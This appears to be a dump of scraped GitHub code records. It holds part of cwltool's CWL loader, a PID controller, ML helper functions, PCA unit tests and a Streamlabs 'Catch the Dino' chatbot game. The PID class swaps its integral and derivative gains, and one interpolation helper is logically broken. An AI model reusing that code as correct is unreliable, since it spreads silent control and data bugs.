CWLObjectType,\n MutableSequence[Union[CWLObjectType, str, int]],\n str,\n ],\n entry,\n )\n )\n\n\ndef _add_blank_ids(\n workflowobj: Union[CWLObjectType, MutableSequence[Union[CWLObjectType, str]]]\n) -> None:\n if isinstance(workflowobj, MutableMapping):\n if (\n \"run\" in workflowobj\n and isinstance(workflowobj[\"run\"], MutableMapping)\n and \"id\" not in workflowobj[\"run\"]\n and \"$import\" not in workflowobj[\"run\"]\n ):\n workflowobj[\"run\"][\"id\"] = str(uuid.uuid4())\n for entry in workflowobj.values():\n _add_blank_ids(\n cast(\n Union[CWLObjectType, MutableSequence[Union[CWLObjectType, str]]],\n entry,\n )\n )\n if isinstance(workflowobj, MutableSequence):\n for entry in workflowobj:\n _add_blank_ids(\n cast(\n Union[CWLObjectType, MutableSequence[Union[CWLObjectType, str]]],\n entry,\n )\n )\n\n\ndef _fast_parser_convert_stdstreams_to_files(\n processobj: Union[cwl_v1_2.Process, MutableSequence[cwl_v1_2.Process]]\n) -> None:\n if isinstance(processobj, cwl_v1_2.CommandLineTool):\n cwl_v1_2_utils.convert_stdstreams_to_files(processobj)\n elif isinstance(processobj, cwl_v1_2.Workflow):\n for st in processobj.steps:\n _fast_parser_convert_stdstreams_to_files(st.run)\n elif isinstance(processobj, MutableSequence):\n for p in processobj:\n _fast_parser_convert_stdstreams_to_files(p)\n\n\ndef _fast_parser_expand_hint_class(\n hints: Optional[Any], loadingOptions: cwl_v1_2.LoadingOptions\n) -> None:\n if isinstance(hints, MutableSequence):\n for h in hints:\n if isinstance(h, MutableMapping) and \"class\" in h:\n for k, v in loadingOptions.namespaces.items():\n if h[\"class\"].startswith(k + \":\"):\n h[\"class\"] = v + h[\"class\"][len(k) + 1 :]\n\n\ndef _fast_parser_handle_hints(\n processobj: Union[cwl_v1_2.Process, MutableSequence[cwl_v1_2.Process]],\n loadingOptions: cwl_v1_2.LoadingOptions,\n) -> None:\n if isinstance(processobj, (cwl_v1_2.CommandLineTool, cwl_v1_2.Workflow)):\n _fast_parser_expand_hint_class(processobj.hints, loadingOptions)\n\n if isinstance(processobj, cwl_v1_2.Workflow):\n for st in processobj.steps:\n _fast_parser_expand_hint_class(st.hints, loadingOptions)\n _fast_parser_handle_hints(st.run, loadingOptions)\n elif isinstance(processobj, MutableSequence):\n for p in processobj:\n _fast_parser_handle_hints(p, loadingOptions)\n\n\ndef update_index(document_loader: Loader, pr: CommentedMap) -> None:\n if \"id\" in pr:\n document_loader.idx[pr[\"id\"]] = pr\n\n\ndef fast_parser(\n workflowobj: Union[CommentedMap, CommentedSeq, None],\n fileuri: Optional[str],\n uri: str,\n loadingContext: LoadingContext,\n fetcher: Fetcher,\n) -> Tuple[Union[CommentedMap, CommentedSeq], CommentedMap]:\n lopt = cwl_v1_2.LoadingOptions(idx=loadingContext.codegen_idx, fileuri=fileuri, fetcher=fetcher)\n\n if uri not in loadingContext.codegen_idx:\n cwl_v1_2.load_document_with_metadata(\n workflowobj,\n fileuri,\n loadingOptions=lopt,\n addl_metadata_fields=[\"id\", \"cwlVersion\"],\n )\n\n objects, loadopt = loadingContext.codegen_idx[uri]\n\n _fast_parser_convert_stdstreams_to_files(objects)\n _fast_parser_handle_hints(objects, loadopt)\n\n processobj: Union[MutableMapping[str, Any], MutableSequence[Any], float, str, None]\n\n processobj = cwl_v1_2.save(objects, relative_uris=False)\n\n metadata: Dict[str, Any] = {}\n metadata[\"id\"] = loadopt.fileuri\n\n if loadopt.namespaces:\n metadata[\"$namespaces\"] = loadopt.namespaces\n if loadopt.schemas:\n metadata[\"$schemas\"] = loadopt.schemas\n if loadopt.baseuri:\n metadata[\"$base\"] = loadopt.baseuri\n for k, v in loadopt.addl_metadata.items():\n if isinstance(processobj, MutableMapping) and k in processobj:\n metadata[k] = processobj[k]\n else:\n metadata[k] = v\n\n if loadingContext.loader:\n loadingContext.loader.graph += loadopt.graph\n\n # Need to match the document loader's index with the fast parser index\n # Get the base URI (no fragments) for documents that use $graph\n nofrag = urllib.parse.urldefrag(uri)[0]\n\n flag = \"fastparser-idx-from:\" + nofrag\n if not loadingContext.loader.idx.get(flag):\n objects, loadopt = loadingContext.codegen_idx[nofrag]\n fileobj = cmap(\n cast(\n Union[int, float, str, Dict[str, Any], List[Any], None],\n cwl_v1_2.save(objects, relative_uris=False),\n )\n )\n visit_class(\n fileobj,\n (\"CommandLineTool\", \"Workflow\", \"ExpressionTool\"),\n partial(update_index, loadingContext.loader),\n )\n loadingContext.loader.idx[flag] = flag\n for u in lopt.imports:\n loadingContext.loader.idx[\"import:\" + u] = \"import:\" + u\n for u in lopt.includes:\n loadingContext.loader.idx[\"include:\" + u] = \"include:\" + u\n\n return cast(\n Union[CommentedMap, CommentedSeq],\n cmap(cast(Union[Dict[str, Any], List[Any]], processobj)),\n ), cast(CommentedMap, cmap(metadata))\n\n\ndef resolve_and_validate_document(\n loadingContext: LoadingContext,\n workflowobj: Union[CommentedMap, CommentedSeq],\n uri: str,\n preprocess_only: bool = False,\n) -> Tuple[LoadingContext, str]:\n \"\"\"Validate a CWL document.\"\"\"\n if not loadingContext.loader:\n raise ValueError(\"loadingContext must have a loader.\")\n else:\n loader = loadingContext.loader\n loadingContext = loadingContext.copy()\n\n if not isinstance(workflowobj, MutableMapping):\n raise ValueError(f\"workflowjobj must be a dict, got {type(workflowobj)!r}: {workflowobj}\")\n\n jobobj = None\n if \"cwl:tool\" in workflowobj:\n jobobj, _ = loader.resolve_all(workflowobj, uri)\n uri = urllib.parse.urljoin(uri, workflowobj[\"https://w3id.org/cwl/cwl#tool\"])\n del cast(Dict[str, Any], jobobj)[\"https://w3id.org/cwl/cwl#tool\"]\n\n workflowobj = fetch_document(uri, loadingContext)[1]\n\n fileuri = urllib.parse.urldefrag(uri)[0]\n\n metadata: CWLObjectType\n\n cwlVersion = loadingContext.metadata.get(\"cwlVersion\")\n if not cwlVersion:\n cwlVersion = workflowobj.get(\"cwlVersion\")\n if not cwlVersion and fileuri != uri:\n # The tool we're loading is a fragment of a bigger file. Get\n # the document root element and look for cwlVersion there.\n metadata = cast(CWLObjectType, fetch_document(fileuri, loadingContext)[1])\n cwlVersion = cast(str, metadata.get(\"cwlVersion\"))\n if not cwlVersion:\n raise ValidationException(\n \"No cwlVersion found. \"\n \"Use the following syntax in your CWL document to declare \"\n \"the version: cwlVersion: .\\n\"\n \"Note: if this is a CWL draft-3 (pre v1.0) document then it \"\n \"will need to be upgraded first using https://pypi.org/project/cwl-upgrader/ . \"\n \"'sbg:draft-2' documents can be upgraded using \"\n \"https://pypi.org/project/sevenbridges-cwl-draft2-upgrader/ .\"\n )\n\n if not isinstance(cwlVersion, str):\n with SourceLine(workflowobj, \"cwlVersion\", ValidationException, loadingContext.debug):\n raise ValidationException(f\"'cwlVersion' must be a string, got {type(cwlVersion)}\")\n # strip out version\n cwlVersion = re.sub(r\"^(?:cwl:|https://w3id.org/cwl/cwl#)\", \"\", cwlVersion)\n if cwlVersion not in list(ALLUPDATES):\n # print out all the Supported Versions of cwlVersion\n versions = []\n for version in list(ALLUPDATES):\n if \"dev\" in version:\n version += \" (with --enable-dev flag only)\"\n versions.append(version)\n versions.sort()\n raise ValidationException(\n \"The CWL reference runner no longer supports pre CWL v1.0 \"\n \"documents. Supported versions are: \"\n \"\\n{}\".format(\"\\n\".join(versions))\n )\n\n if isinstance(jobobj, CommentedMap) and \"http://commonwl.org/cwltool#overrides\" in jobobj:\n loadingContext.overrides_list.extend(resolve_overrides(jobobj, uri, uri))\n del jobobj[\"http://commonwl.org/cwltool#overrides\"]\n\n if isinstance(jobobj, CommentedMap) and \"https://w3id.org/cwl/cwl#requirements\" in jobobj:\n if cwlVersion not in (\"v1.1.0-dev1\", \"v1.1\"):\n raise ValidationException(\n \"`cwl:requirements` in the input object is not part of CWL \"\n \"v1.0. You can adjust to use `cwltool:overrides` instead; or you \"\n \"can set the cwlVersion to v1.1 or greater.\"\n )\n loadingContext.overrides_list.append(\n {\n \"overrideTarget\": uri,\n \"requirements\": jobobj[\"https://w3id.org/cwl/cwl#requirements\"],\n }\n )\n del jobobj[\"https://w3id.org/cwl/cwl#requirements\"]\n\n (sch_document_loader, avsc_names) = process.get_schema(cwlVersion)[:2]\n\n if isinstance(avsc_names, Exception):\n raise avsc_names\n\n processobj: ResolveType\n document_loader = Loader(\n sch_document_loader.ctx,\n schemagraph=sch_document_loader.graph,\n idx=loader.idx,\n cache=sch_document_loader.cache,\n fetcher_constructor=loadingContext.fetcher_constructor,\n skip_schemas=loadingContext.skip_schemas,\n doc_cache=loadingContext.doc_cache,\n )\n\n loadingContext.loader = document_loader\n\n if cwlVersion == \"v1.0\":\n _add_blank_ids(workflowobj)\n\n if cwlVersion != \"v1.2\":\n loadingContext.fast_parser = False\n\n if loadingContext.skip_resolve_all:\n # Some integrations (e.g. Arvados) loads documents, makes\n # in-memory changes to them (which are applied to the objects\n # in the document_loader index), and then sends them back\n # through the loading machinery.\n #\n # In this case, the functions of resolve_all() have already\n # happened. Because resolve_all() is expensive, we don't want\n # to do it again if it's going to be a no-op, so the\n # skip_resolve_all flag tells us just to use the document\n # as-is from the loader index.\n #\n # Note that at the moment, fast_parser code path is considered\n # functionally the same as resolve_all() for this case.\n #\n processobj, metadata = document_loader.resolve_ref(uri)\n elif loadingContext.fast_parser:\n processobj, metadata = fast_parser(\n workflowobj, fileuri, uri, loadingContext, document_loader.fetcher\n )\n else:\n document_loader.resolve_all(workflowobj, fileuri)\n processobj, metadata = document_loader.resolve_ref(uri)\n\n if not isinstance(processobj, (CommentedMap, CommentedSeq)):\n raise ValidationException(\"Workflow must be a CommentedMap or CommentedSeq.\")\n\n if not hasattr(processobj.lc, \"filename\"):\n processobj.lc.filename = fileuri\n\n if loadingContext.metadata:\n metadata = loadingContext.metadata\n\n # Make a shallow copy. If we do a version update later, metadata\n # will be updated, we don't want to write through and change the\n # original object.\n metadata = copy.copy(metadata)\n\n if not isinstance(metadata, CommentedMap):\n raise ValidationException(\"metadata must be a CommentedMap, was %s\" % type(metadata))\n\n if isinstance(processobj, CommentedMap):\n uri = processobj[\"id\"]\n\n if not loadingContext.fast_parser:\n _convert_stdstreams_to_files(workflowobj)\n\n if isinstance(jobobj, CommentedMap):\n loadingContext.jobdefaults = jobobj\n\n loadingContext.avsc_names = avsc_names\n loadingContext.metadata = metadata\n\n if preprocess_only:\n return loadingContext, uri\n\n if loadingContext.do_validate:\n validate_doc(avsc_names, processobj, document_loader, loadingContext.strict)\n\n # None means default behavior (do update)\n if loadingContext.do_update in (True, None):\n if \"cwlVersion\" not in metadata:\n metadata[\"cwlVersion\"] = cwlVersion\n processobj = update.update(\n processobj, document_loader, fileuri, loadingContext.enable_dev, metadata\n )\n document_loader.idx[processobj[\"id\"]] = processobj\n\n visit_class(\n processobj,\n (\"CommandLineTool\", \"Workflow\", \"ExpressionTool\"),\n partial(update_index, document_loader),\n )\n\n return loadingContext, uri\n\n\ndef make_tool(\n uri: Union[str, CommentedMap, CommentedSeq], loadingContext: LoadingContext\n) -> Process:\n \"\"\"Make a Python CWL object.\"\"\"\n if loadingContext.loader is None:\n raise ValueError(\"loadingContext must have a loader\")\n\n resolveduri: Union[float, str, CommentedMap, CommentedSeq, None]\n metadata: CWLObjectType\n\n if loadingContext.fast_parser and isinstance(uri, str) and not loadingContext.skip_resolve_all:\n resolveduri, metadata = fast_parser(\n None, None, uri, loadingContext, loadingContext.loader.fetcher\n )\n else:\n resolveduri, metadata = loadingContext.loader.resolve_ref(uri)\n\n processobj = None\n if isinstance(resolveduri, MutableSequence):\n for obj in resolveduri:\n if obj[\"id\"].endswith(\"#main\"):\n processobj = obj\n break\n if not processobj:\n raise GraphTargetMissingException(\n \"Tool file contains graph of multiple objects, must specify \"\n \"one of #%s\"\n % \", #\".join(urllib.parse.urldefrag(i[\"id\"])[1] for i in resolveduri if \"id\" in i)\n )\n elif isinstance(resolveduri, MutableMapping):\n processobj = resolveduri\n else:\n raise Exception(\"Must resolve to list or dict\")\n\n tool = loadingContext.construct_tool_object(processobj, loadingContext)\n\n if loadingContext.jobdefaults:\n jobobj = loadingContext.jobdefaults\n for inp in tool.tool[\"inputs\"]:\n if shortname(inp[\"id\"]) in jobobj:\n inp[\"default\"] = jobobj[shortname(inp[\"id\"])]\n\n return tool\n\n\ndef load_tool(\n argsworkflow: Union[str, CWLObjectType],\n loadingContext: Optional[LoadingContext] = None,\n) -> Process:\n loadingContext, workflowobj, uri = fetch_document(argsworkflow, loadingContext)\n\n loadingContext, uri = resolve_and_validate_document(\n loadingContext,\n workflowobj,\n uri,\n )\n\n return make_tool(uri, loadingContext)\n\n\ndef resolve_overrides(\n ov: IdxResultType,\n ov_uri: str,\n baseurl: str,\n) -> List[CWLObjectType]:\n ovloader = Loader(overrides_ctx)\n ret, _ = ovloader.resolve_all(ov, baseurl)\n if not isinstance(ret, CommentedMap):\n raise Exception(\"Expected CommentedMap, got %s\" % type(ret))\n cwl_docloader = get_schema(\"v1.0\")[0]\n cwl_docloader.resolve_all(ret, ov_uri)\n return cast(List[CWLObjectType], ret[\"http://commonwl.org/cwltool#overrides\"])\n\n\ndef load_overrides(ov: str, base_url: str) -> List[CWLObjectType]:\n ovloader = Loader(overrides_ctx)\n return resolve_overrides(ovloader.fetch(ov), ov, base_url)\n\n\ndef recursive_resolve_and_validate_document(\n loadingContext: LoadingContext,\n workflowobj: Union[CommentedMap, CommentedSeq],\n uri: str,\n preprocess_only: bool = False,\n) -> Tuple[LoadingContext, str, Process]:\n \"\"\"Validate a CWL document, checking that a tool object can be built.\"\"\"\n loadingContext, uri = resolve_and_validate_document(\n loadingContext,\n workflowobj,\n uri,\n preprocess_only=preprocess_only,\n )\n tool = make_tool(uri, loadingContext)\n return loadingContext, uri, tool\n","repo_name":"common-workflow-language/cwltool","sub_path":"cwltool/load_tool.py","file_name":"load_tool.py","file_ext":"py","file_size_in_byte":24252,"program_lang":"python","lang":"en","doc_type":"code","stars":316,"dataset":"github-code","pt":"72"} +{"seq_id":"5261507497","text":"import numpy as np\nimport rospy\n\nclass PIDControllerBase():\n def __init__(self, _p, _i, _d, _sat):\n self.Kp = _p\n self.Kd = _i\n self.Ki = _d\n self.sat = _sat\n\n self.integral = 0 \n self.prev_err = 0\n self.prev_t = -1.0\n \n def regulate(self, _err, _t, id_val):\n derr_dt = 0.0\n dt = _t - self.prev_t\n if self.prev_t > 0.0 and dt > 0.0:\n derr_dt = (_err - self.prev_err) / dt\n self.integral += 0.5 * (_err + self.prev_err) * dt\n\n u = self.Kp * _err + self.Kd * derr_dt + self.Ki * self.integral\n\n self.prev_err = _err\n self.prev_t = _t\n\n if (np.linalg.norm(u) > self.sat):\n # controller is in saturation: limit output, reset integral\n u = self.sat * u / np.linalg.norm(u)\n self.integral = 0.0\n\n return u\n","repo_name":"crvogt/spacecraft_sim","sub_path":"sc_control/src/PID/PIDControllerBase.py","file_name":"PIDControllerBase.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21968536","text":"\nimport pandas as pd\n\nfrom . import module_dir\nfrom . import data\n\ndef interpolate_na(df: pd.DataFrame, cols: list, inplace=True):\n if inplace:\n for col in cols:\n df[col].ffill(inplace=True)\n df[col].bfill(inplace=True)\n\n df[col].interpolate(inplace=True) \n\n df[col].fillna(df[col].cummax(), inplace=True)\n\n else:\n new_df = None\n for col in cols:\n new_df = df[col].ffill(inplace=inplace)\n new_df = df[col].bfill(inplace=inplace)\n\n new_df = df[col].fillna(df[col].interpolate().cummax(), inplace=inplace)\n\n return new_df\n\n\ndef map_hour_to_seasonal(df, hour_col):\n mapping = {1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6,\n 7: 7, 8: 8, 9: 9, 10: 10, 11: 11, 12: 12,\n 13: 11, 14: 10, 15: 9, 16: 8, 17: 7, 18: 6,\n 19: 5, 20: 4, 21: 3, 22: 2, 23: 1, 24: 0,}\n df[hour_col].replace(mapping, inplace=True)\n\ndef map_month_to_seasonal(df, month_col):\n mapping = {1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6,\n 7: 5, 8: 4, 9: 3, 10: 2, 11: 1, 12: 0}\n \n df[month_col].replace(mapping, inplace=True)\n\n# liste med 'y_pred' \n\ndef y_pred_to_csv(file_name, df):\n df[['y_pred']].reset_index(drop=True).reset_index().rename(columns={'index': 'id', 'y_pred': 'prediction'}).to_csv(module_dir + \"/../submissions/\" + file_name, index=False)\n\ndef make_submittable(file_name, model = None, model_dict = None):\n \"\"\"\n model if same model used for all locations\n model dict if not\n\n model is instance of model (model = MetaModel())\n model dict uses location as key ({\"A\": MetaModel(), \"B\": MetaModel(), \"C\": MetaModel()})\n \"\"\"\n\n df = data.get_training_cleaned()\n test = data.get_testing_flattened()\n ret = pd.DataFrame()\n \n for location in ['A', 'B', 'C']:\n temp_df = df[df['location']==location]\n temp_test = test[test['location']==location]\n\n if model is not None:\n m = model\n elif model_dict is not None:\n m = model_dict[location]\n else:\n raise ValueError(\"no model specified\")\n \n m.train(temp_df)\n fcst = m.predict(temp_test)\n\n ret = pd.concat([ret, fcst])\n\n y_pred_to_csv(file_name, ret)","repo_name":"jacob-a-worsoe/stabekk","sub_path":"ml_combat/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23707571689","text":"a = 3\nb = 4\nab = 12\nprint(a,\"multiplied by\",b,\"is\",ab)\n\nname = \"Bill & Aileen M.\"\naddress = \"975 Bennett Drive\"\ncity = \"Longwood, \"\nzipcode = \"FL 32750\"\nprint(name)\nprint(address)\nprint(city+zipcode)\n\nl= 5\nh = 6\nw = 2\nlh = l*h\nlw = l*w\nhw = h*w\nsurfaceArea =(lh+lw+hw+lh+lw+hw)\nprint(\"The surface area of your rectangle is\", surfaceArea)\n\n\n\n\n","repo_name":"AndreaxMoore/Moore_Andrea","sub_path":"PyLesson_02/Lab_02.py","file_name":"Lab_02.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38713209625","text":"\"\"\"module contains unittests for pca\"\"\"\nimport unittest\nfrom unittest.mock import patch\nfrom unittest.mock import Mock\n\nimport numpy as np\nimport pytest\n\nfrom gn3.computations.pca import cache_pca_dataset\nfrom gn3.computations.pca import generate_pca_temp_traits\nfrom gn3.computations.pca import generate_scree_plot_data\nfrom gn3.computations.pca import process_factor_loadings_tdata\n\n\nclass TestPCA(unittest.TestCase):\n \"\"\"pca testcase class\"\"\"\n\n @pytest.mark.unit_test\n def test_process_factor_loadings(self):\n \"\"\"test for processing factor loadings\"\"\"\n\n test_array = np.array([\n [-0.23511749, -0.61483617, -0.26872797, 0.70319381],\n [-0.71057342, 0.4623377, -0.52921008, -0.0355803],\n [-0.60977093, -0.02877103, 0.78874096, 0.07238328],\n [0.26073856, 0.63827311, 0.16003023, 0.70640864]\n ])\n\n expected_results = [[-0.23511749, -0.71057342, -0.60977093],\n [-0.61483617, 0.4623377, -0.02877103],\n [-0.26872797, -0.52921008, 0.78874096],\n [0.70319381, -0.0355803, 0.07238328]]\n\n self.assertEqual(process_factor_loadings_tdata(\n test_array, 3), expected_results)\n\n @pytest.mark.unit_test\n @patch(\"gn3.computations.pca.generate_pca_traits_vals\")\n def test_generate_pca_datasets(self, mock_pca_data):\n \"\"\"test for generating temp pca dataset\"\"\"\n\n mock_pca_data.return_value = np.array([[21, 10, 17, 15, 13],\n [21, 11, 18,\n 9, 1],\n [22, 16, 0,\n 0.22667229, -1],\n [31, 12, 10, 17, 11]])\n\n shared_samples = [\"BXD1\", \"BXD2\", \"BXD\", \"BXD4\", \"Unkown\"]\n\n dataset_samples = [\"BXD1\", \"BXD5\", \"BXD4\", \"BXD\"]\n expected_results = {\n \"PCA1_mouse_G1_now\": [\"21.0\", \"x\", \"10.0\", \"17.0\"],\n \"PCA2_mouse_G1_now\": [\"21.0\", \"x\", \"11.0\", \"18.0\"],\n \"PCA3_mouse_G1_now\": [\"22.0\", \"x\", \"16.0\", \"0.0\"],\n \"PCA4_mouse_G1_now\": [\"31.0\", \"x\", \"12.0\", \"10.0\"]\n }\n\n results = generate_pca_temp_traits(species=\"mouse\", group=\"G1\",\n traits_data=[],\n dataset_samples=dataset_samples,\n corr_array=[],\n shared_samples=shared_samples,\n create_time=\"now\")\n\n self.assertEqual(results, expected_results)\n\n @pytest.mark.unit_test\n def test_generate_scree_plot(self):\n \"\"\"test scree plot data is generated\"\"\"\n\n variance = [0.9271, 0.06232, 0.031]\n\n self.assertEqual(generate_scree_plot_data(variance),\n (['PC1', 'PC2', 'PC3'], [92.7, 6.2, 3.1]))\n\n @pytest.mark.unit_test\n def test_cache_pca_datasets(self):\n \"\"\"test for caching pca datasets\"\"\"\n\n pca_traits = {\n \"PCA_1\": [\"11.0\", \"x\", \"9.0\", \"7.0\"],\n \"PCA_2\": [\"x\", \"x\", \"1.2\", \"3.1\"]\n }\n\n self.assertEqual(cache_pca_dataset(redis_conn={}, exp_days=30,\n pca_trait_dict=pca_traits), False)\n\n mock_redis = Mock()\n mock_redis.set.return_value = True\n\n test_data = [({}, 30, pca_traits, False),\n (mock_redis, 30, pca_traits, True)]\n\n for (test_redis, exp_day, test_traits, expected) in test_data:\n\n with self.subTest(redis_conn=test_redis,\n exp_days=exp_day, pca_trait_dict=test_traits):\n\n self.assertEqual(cache_pca_dataset(\n test_redis, exp_day, test_traits), expected)\n","repo_name":"genenetwork/genenetwork3","sub_path":"tests/unit/computations/test_pca.py","file_name":"test_pca.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"24060677223","text":"import os\nimport sys\nimport clr\nimport codecs\nimport re\nimport json\nimport threading\n\n# Required script variables\nScriptName = \"Catch the Dino\"\nDescription = \"Win points taming dinosaurs from all sizes!\"\nCreator = \"LuisSanchezDev\"\nWebsite = \"https://www.fiverr.com/luissanchezdev\"\nVersion = \"1.0.1\"\n\n# Define Global Variables\nglobal PATH, CONFIG_FILE, SETTINGS\nPATH = os.path.dirname(os.path.realpath(__file__))\nCONFIG_FILE = os.path.join(PATH, \"config.json\")\nSETTINGS = {}\n\n\n# Initialize Data (Only called on load)\ndef Init():\n global SETTINGS, CONFIG_FILE\n \n try:\n with codecs.open(CONFIG_FILE, encoding='utf-8-sig', mode='r') as file:\n SETTINGS = json.load(file, encoding='utf-8-sig')\n except Exception as error:\n SETTINGS = {\n \"command\": \"!tame\",\n \"cmd_feed\": \"!feed\",\n \"usercd\": 30,\n \"globalcd\": 3,\n \"firstline\": \"$user attempts to tame $adjective $dino\",\n \"firsttosecondwait\": 5,\n \"secondline\": \". . .\",\n \"secondtothirdwait\": 5,\n \"thirdtofourthwait\": 5,\n \"win_line\": \"$user won $points $currency for taming a $adjective $dino!\",\n \"win_response\": \"This dino is tamed!!\",\n \"lose_response\": \"This dino ran away\",\n \"tame_prize\": 10,\n \"small_mult\": 1,\n \"medium_mult\": 2,\n \"big_mult\": 3,\n \"feed_msg_win\": \"The $adjective $dino ate the food peacefully, you win $prize $currency\",\n \"feed_msg_lose\": \"The $adjective $dino growls at you, better luck next time\",\n\n }\n\n# Execute Data / Process messages\ndef Execute(data):\n global SETTINGS\n if data.IsChatMessage():\n if data.GetParam(0) == SETTINGS[\"cmd_feed\"]:\n size = get_random_size()\n dinosaur = get_dinosaur_of_size(size)\n success = Parent.GetRandom(0, 100) >= 50\n if success:\n points = SETTINGS[\"tame_prize\"] * SETTINGS[size + \"_mult\"] / 3\n output = SETTINGS[\"feed_msg_win\"]\n output = output.replace( '$dino' ,dinosaur)\n output = output.replace('$adjective',size)\n output = output.replace( '$user' ,data.User)\n output = output.replace( '$prize' ,str(points))\n output = output.replace('$currency' ,Parent.GetCurrencyName())\n Parent.SendStreamMessage((output))\n Parent.AddPoints(data.User, data.User, points)\n else:\n output = SETTINGS[\"feed_msg_lose\"]\n output = output.replace( '$dino' ,dinosaur)\n output = output.replace('$adjective',size)\n Parent.SendStreamMessage(output)\n return\n elif not data.GetParam(0) == SETTINGS['command']: return\n if Parent.IsOnUserCooldown(ScriptName, SETTINGS[\"command\"], data.User) and int(SETTINGS[\"usercd\"]) > 0:\n output = get_random_user_cd_response()['name'].replace('$user',data.User)\n output = output.replace('$randusername',Parent.GetRandomActiveUser())\n Parent.SendStreamMessage(output)\n return\n if Parent.IsOnCooldown(ScriptName, SETTINGS[\"command\"]) and int(SETTINGS[\"globalcd\"]) > 0:\n output = get_random_global_cd_response()['name'].replace('$user',data.User)\n output = output.replace('$randusername',Parent.GetRandomActiveUser())\n Parent.SendStreamMessage(output)\n return\n\n size = get_random_size()\n dinosaur = get_dinosaur_of_size(size)\n success = get_random_success()\n \n firstline = SETTINGS['firstline']\n firstline = firstline.replace('$user' ,data.User)\n firstline = firstline.replace('$adjective', size)\n firstline = firstline.replace('$dino' ,dinosaur)\n Parent.SendStreamMessage(firstline)\n \n threading.Timer(SETTINGS['firsttosecondwait'],lambda: Parent.SendStreamMessage(SETTINGS['secondline'])).start()\n lastlineswait = SETTINGS['firsttosecondwait'] + SETTINGS['secondtothirdwait']\n \n successline = success['name']\n successline = successline.replace('$dino',dinosaur)\n successline = successline.replace('$user',data.User)\n threading.Timer(lastlineswait,lambda: Parent.SendStreamMessage(successline)).start()\n \n if success[\"success\"]:\n points = SETTINGS[\"tame_prize\"] * SETTINGS[size + \"_mult\"]\n\n output = SETTINGS[\"win_line\"]\n output = output.replace( '$dino' ,dinosaur)\n output = output.replace('$adjective',size)\n output = output.replace( '$user' ,data.User)\n output = output.replace( '$points' ,str(points))\n output = output.replace('$currency' ,Parent.GetCurrencyName())\n threading.Timer(lastlineswait + SETTINGS['thirdtofourthwait'],lambda: Parent.SendStreamMessage(output)).start()\n threading.Timer(lastlineswait + SETTINGS['thirdtofourthwait'],lambda: Parent.AddPoints(data.User,data.UserName,points)).start()\n Parent.AddUserCooldown(ScriptName, SETTINGS[\"command\"], data.User, int(SETTINGS[\"usercd\"]) * 60)\n Parent.AddCooldown(ScriptName, SETTINGS[\"command\"], int(SETTINGS[\"globalcd\"]) * 60)\n\n# Tick method (Gets called during every iteration even when there is no incoming data)\ndef Tick():\n pass\n\ndef get_random_size():\n sizes = [\n {\"size\": \"small\", \"probability\": 70},\n {\"size\": \"medium\", \"probability\": 20},\n {\"size\": \"big\", \"probability\": 10}\n ]\n sizes = sorted(sizes, key=lambda x: x['probability'])\n last_cumulative_prob = 0.0\n for size in sizes:\n size['cumulativeprobability'] = last_cumulative_prob + size['probability']\n last_cumulative_prob = size['cumulativeprobability']\n return get_weighted_random(sizes)[\"size\"]\n\ndef get_random_success():\n successes = [\n {\"name\": SETTINGS[\"win_response\"], \"success\": True, \"probability\": 70},\n {\"name\": SETTINGS[\"lose_response\"], \"success\": False, \"probability\": 30},\n ]\n successes = sorted(successes, key=lambda x: x['probability'])\n last_cumulative_prob = 0.0\n for success in successes:\n success['cumulativeprobability'] = last_cumulative_prob + success['probability']\n last_cumulative_prob = success['cumulativeprobability']\n return get_weighted_random(successes)\n\ndef get_dinosaur_of_size(size):\n dino_file = os.path.join(PATH, \"config\",size + \".txt\")\n lines = list(open(dino_file))\n if len(lines) > 0:\n return lines[Parent.GetRandom(0, len(lines))].replace(\"\\r\",\"\").replace(\"\\n\",\"\")\n\ndef get_random_user_cd_response():\n return get_weighted_random(load_user_cd_responses())\ndef get_random_global_cd_response():\n return get_weighted_random(load_global_cd_responses())\ndef get_weighted_random(inputlist):\n dice = Parent.GetRandom(0, inputlist[-1][\"cumulativeprobability\"])\n for entry in inputlist:\n if entry['cumulativeprobability'] >= dice:\n return entry\n\ndef load_user_cd_responses():\n return parse_list_file('config\\\\usercd_responses.json')\ndef load_global_cd_responses():\n return parse_list_file('config\\\\globalcd_responses.json')\ndef parse_list_file(filename):\n global PATH\n content = []\n try:\n with codecs.open(os.path.join(PATH, filename), encoding='utf-8-sig', mode='r') as file:\n content = json.load(file, encoding='utf-8-sig')\n except Exception as error:\n Parent.Log('ERROR','Error!' + str(error))\n return []\n \n try:\n parsedcontent = sorted(content, key = lambda x : x['probability'])\n except:\n MessageBox.Show(str(content))\n return\n lastprob = 0.0\n for line in parsedcontent:\n line['cumulativeprobability'] = lastprob + line['probability']\n lastprob = line['cumulativeprobability']\n return parsedcontent\n\n# UI Buttons\ndef edit_small_dinos():\n file_path = os.path.join(PATH, \"config\", \"small.txt\")\n os.startfile(file_path)\ndef edit_medium_dinos():\n file_path = os.path.join(PATH, \"config\", \"medium.txt\")\n os.startfile(file_path)\ndef edit_big_dinos():\n file_path = os.path.join(PATH, \"config\", \"big.txt\")\n os.startfile(file_path)\ndef edit_global_cd():\n file_path = os.path.join(PATH, \"config\", \"small.txt\")\n os.startfile(file_path)\ndef donate():\n os.startfile(\"https://streamlabs.com/luissanchezdev/tip\")\ndef open_contact_me():\n os.startfile(\"https://www.fiverr.com/luissanchezdev\")\ndef open_contact_td():\n os.startfile(\"https://www.fiverr.com/tecno_diana\")\ndef open_readme():\n os.startfile(\"https://github.com/LuisSanchez-Dev/catch-the-dino\")","repo_name":"LuisSanchez-Dev/catch-the-dino","sub_path":"CatchtheDino_StreamlabsSystem.py","file_name":"CatchtheDino_StreamlabsSystem.py","file_ext":"py","file_size_in_byte":8055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43137627475","text":"import os\nimport json\nfrom apps.app_dnf import update_software\nfrom 